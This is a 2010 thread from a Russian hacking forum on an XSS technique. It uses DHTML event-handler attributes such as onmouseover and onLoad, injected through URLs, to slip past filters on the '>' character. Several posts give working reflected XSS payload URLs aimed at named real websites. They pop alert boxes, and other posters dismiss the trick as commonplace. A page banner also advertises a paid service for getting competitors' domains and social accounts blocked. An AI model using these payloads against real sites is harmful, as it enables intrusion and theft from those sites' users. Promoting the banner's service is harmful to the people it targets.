DHTML inj (XSS)

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
DHTML inj (XSS)

Опции темы

Поиск в этой теме

Опции просмотра

25.10.2010, 19:24

Bo0oM

Новичок

Регистрация: 26.12.2009

Сообщений: 4

С нами: 8619130

Репутация: 5

Чисто для общего развития.

Не многие знают об этой уязвимости, действует как пассивная или активная XSS при работе с DHTML (динамическим html), реагирует на одно из событий, например onMouseOver - возникает при наведении курсора мыши на элемент, подверженный уязвимости. (другие события DHTML и примеры их использования тут)

Полезно при фильтрации символов ">" и "[B]XSS не проёдет

Примеры формирования (алерт при наведении мыши на текст):

Код:

http://javagala.ru/dwnld/index.php/" onmouseover=alert() bad="

Код:

http://javagala.ru/dwnld/index.php/"onmouseover=alert()%3E

После детального изучения выяснилось, что большое количество сайтов подвержено данной уязвимости.

Вот так вот...

𝕏 Twitter Reddit Telegram Копировать ссылку

25.10.2010, 22:21

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,315

С нами: 10248806

Репутация: 2371

О чем "статья" ?

25.10.2010, 23:12

ok-man

Новичок

Регистрация: 24.10.2010

Сообщений: 3

С нами: 8184566

Репутация: 0

это обычный хсс, в каждой статье о пробиве фильтров говорится

30.10.2010, 02:11

<Cyber-punk>

Участник форума

Регистрация: 01.10.2009

Сообщений: 105

С нами: 8742676

Репутация: 94

Цитата:

Сообщение от None

http://bookz.ru/dl2.php?id=12306&e=%20'';!--%22%3CBODY%20onLoad=%22javascript:window.alert('ha cked')%22%3E=&{()}&t=z&g=&f=pushki54&a_id=1193

Аналогично!

Но можно проще:

Цитата:

Сообщение от None

http://javagala.ru/dwnld/index.php/%22;!--%22%3CBODY%20onLoad=%22javascript:window.alert('ha cked')%22%3E=&%7B()%7D

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules